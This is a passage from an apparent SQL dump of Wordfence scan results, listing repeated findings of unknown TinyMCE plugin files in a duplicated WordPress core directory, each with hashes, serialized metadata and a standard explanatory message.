from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:68:\"wp-includes/wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34395,1631564704,1631564704,'new','knownfile',75,'fc102afaec9cc8c7305387d6b05a2823','79300e38e77ad6abcbfd42bb9d516e39','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/compat3x/css/dialog.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/tinymce/plugins/compat3x/css/dialog.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34396,1631564704,1631564704,'new','knownfile',75,'7ea8db9a1a697d2f78fa629145f48731','3a4f2cba78bc0b2fafa8cceba2476d21','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/compat3x/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/js/tinymce/plugins/compat3x/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34397,1631564705,1631564705,'new','knownfile',75,'f74536056c1dfd101be764462a6052ec','ef2e401c835cf5800f5e8567d59c40af','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/compat3x/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/js/tinymce/plugins/compat3x/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34398,1631564705,1631564705,'new','knownfile',75,'d170b7a19efaa50ee62fee281b430c41','e6b6054b3d2969126410d18536553043','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/directionality/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/js/tinymce/plugins/directionality/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34399,1631564705,1631564705,'new','knownfile',75,'facacec8b83635fe55893d60e7c8ed7c','0658a65d6d22b8bb5afc36de67d06592','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/directionality/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/js/tinymce/plugins/directionality/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34400,1631564705,1631564705,'new','knownfile',75,'6ef289cd5a1c5d43a8acf6018ff2975e','c822f5c98a92ac4c3636c9af10fa90e5','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/fullscreen/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/js/tinymce/plugins/fullscreen/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34401,1631564705,1631564705,'new','knownfile',75,'8f76dc17d43e3d3d01142cf69da6da6f','ac94ccdeacb12571b369f3cdfb682d0c','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34402,1631564705,1631564705,'new','knownfile',75,'06ac43458945cea8053ca2da2946f1f1','4dfa0439e32091f39824867759bed2ad','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/hr/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/tinymce/plugins/hr/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34403,1631564705,1631564705,'new','knownfile',75,'7272a1a1202101ec3237005b722a152e','156c208b562f5c7bdb2a1b0b1e6635b0','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/hr/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/js/tinymce/plugins/hr/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34404,1631564705,1631564705,'new','knownfile',75,'bdff3d30779f73059779cfa82ec6c984','195850c94bdd6d3c5f03d57c3076c2ea','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/image/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/tinymce/plugins/image/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34405,1631564705,1631564705,'new','knownfile',75,'6dc054dc2f32d8a9b1447fa6a7b9e767','da29389e9f121175245de32f9776271c','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/image/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/tinymce/plugins/image/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34406,1631564705,1631564705,'new','knownfile',75,'2c933a8d714d0e01d04d95a36765507f','580b3305dd239d2b81aeacff371b7d60','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/link/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/tinymce/plugins/link/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34407,1631564705,1631564705,'new','knownfile',75,'3bc3b37d93ac53679eedb61d18747e2c','62a92899782cc6fd74d4f00a8f3e79e4','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/link/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/js/tinymce/plugins/link/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34408,1631564705,1631564705,'new','knownfile',75,'53480c1a8b59464c728c310a3d2b63a8','73e6c5c3a5fb0bd9d12d2eea8bc852e8','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/lists/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/tinymce/plugins/lists/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34409,1631564705,1631564705,'new','knownfile',75,'e5e700c33b4a26bd92b52edd7deb4bb1','9f550f7bfc58497abd382e86be426e52','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/lists/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/tinymce/plugins/lists/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34410,1631564705,1631564705,'new','knownfile',75,'b16709942bcd747aeb66d897228f5f94','96a9cebd4deda94dfea6c16bb051ea7f','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/media/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/tinymce/plugins/media/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34411,1631564705,1631564705,'new','knownfile',75,'a7f7cfd8681939ba30546a7e87e4790b','dd7c2c8cdf6b577ea51d669b311b49b0','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/media/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/tinymce/plugins/media/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34412,1631564705,1631564705,'new','knownfile',75,'066b46ed115e9879b40432f5d5871264','f22eeb040811d90f9ee875a0f02c6941','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/paste/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/tinymce/plugins/paste/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34413,1631564705,1631564705,'new','knownfile',75,'3b255fa6edcdda4b25a07d7cdc869e10','e262b1d3b59ece807c8ad522dbac9e9e','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/paste/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/tinymce/plugins/paste/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34414,1631564705,1631564705,'new','knownfile',75,'586be478fc1839f7769fd94fc1c3987e','92c0c587f886918f4c1517b025785d0c','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/tabfocus/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/js/tinymce/plugins/tabfocus/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34415,1631564705,1631564705,'new','knownfile',75,'9d5f168fd40cc133027c00bce01990e3','0b66f881b02c0d0010ccacb48620270f','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34416,1631564705,1631564705,'new','knownfile',75,'33e3a69c557575f610d99187c8342ba3','990df6f55e6bff6687c35f3b8c445044','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/textcolor/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/tinymce/plugins/textcolor/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34417,1631564705,1631564705,'new','knownfile',75,'bce0ee7b688816ee5fd6bc1f870d1efa','46392b6cde9b8b16993fc0c993101ed1','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/textcolor/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/tinymce/plugins/textcolor/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34418,1631564705,1631564705,'new','knownfile',75,'8bbf830db6323fc9e2c1975c5e96b949','fab55ca52212387f473794130449a701','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wordpress/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/tinymce/plugins/wordpress/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34419,1631564705,1631564705,'new','knownfile',75,'877aeb8ff407d397358cae64ecb55038','c8b11198956d6d0834358634a2ecf795','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wordpress/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/tinymce/plugins/wordpress/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34420,1631564705,1631564705,'new','knownfile',75,'352bdab8bc9789ce8df95915cec6fe55','4987ccf7ac14b98cdd000bb02b60743d','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpautoresize/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/js/tinymce/plugins/wpautoresize/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34421,1631564705,1631564705,'new','knownfile',75,'b9eb054205db8c866d245e6460ab7a8b','b5367086ae06fe3370321991624e8579','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34422,1631564705,1631564705,'new','knownfile',75,'e99f7a2cdf1f940e27d8d6ecffbd3dd4','a69bedee5046b7551778b1a4f615db7b','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpdialogs/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/tinymce/plugins/wpdialogs/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34423,1631564705,1631564705,'new','knownfile',75,'f7323493d973cb72107929cd421339dc','c1cda47073fd60ba6eb379515c3800a5','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34424,1631564705,1631564705,'new','knownfile',75,'54eaef8df1244ac356dab5eafb87ea15','f77d4b4f5551cd17cdc33ee9caee5b29','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpeditimage/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/js/tinymce/plugins/wpeditimage/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34425,1631564705,1631564705,'new','knownfile',75,'184769459501affd88e4c3368b30c80d','771b8184d8f819662bb2ef86a51d2efb','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:68:\"wp-includes/wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34426,1631564705,1631564705,'new','knownfile',75,'8780df2e6401acd3f6c34ceb56fb77c3','70b36efdee05e862fd0bda85590bc71a','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpemoji/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/js/tinymce/plugins/wpemoji/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34427,1631564705,1631564705,'new','knownfile',75,'2353ae9dd05f4a962112c8dfb6cc0e6b','922af3a95fc30dfca77cfb7662e5216d','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34428,1631564705,1631564705,'new','knownfile',75,'f1c8f016ca10038b4bed5cdfc26d5d5d','bcc88bfab3cba6ebda8dabb0ee71d809','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpgallery/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/tinymce/plugins/wpgallery/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34429,1631564705,1631564705,'new','knownfile',75,'5712a53d779d2aa76a885ac9a9e071b9','69c7b851176ffc264dde52f6a0afc2db','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34430,1631564705,1631564705,'new','knownfile',75,'a21b625eb3c6bc6b221eaf678d138d41','291a62c01142e033f913c6b0b57a5551','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wplink/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/js/tinymce/plugins/wplink/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34431,1631564705,1631564705,'new','knownfile',75,'2b5ff4b3ff71121095654cdd24475018','74993d3cf6226fa688db17b230c76e0a','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wplink/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/js/tinymce/plugins/wplink/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34432,1631564705,1631564705,'new','knownfile',75,'1236f02a118f63382c245969b98815d4','cba5760363e5fba47fa14b8551c3515d','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wptextpattern/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 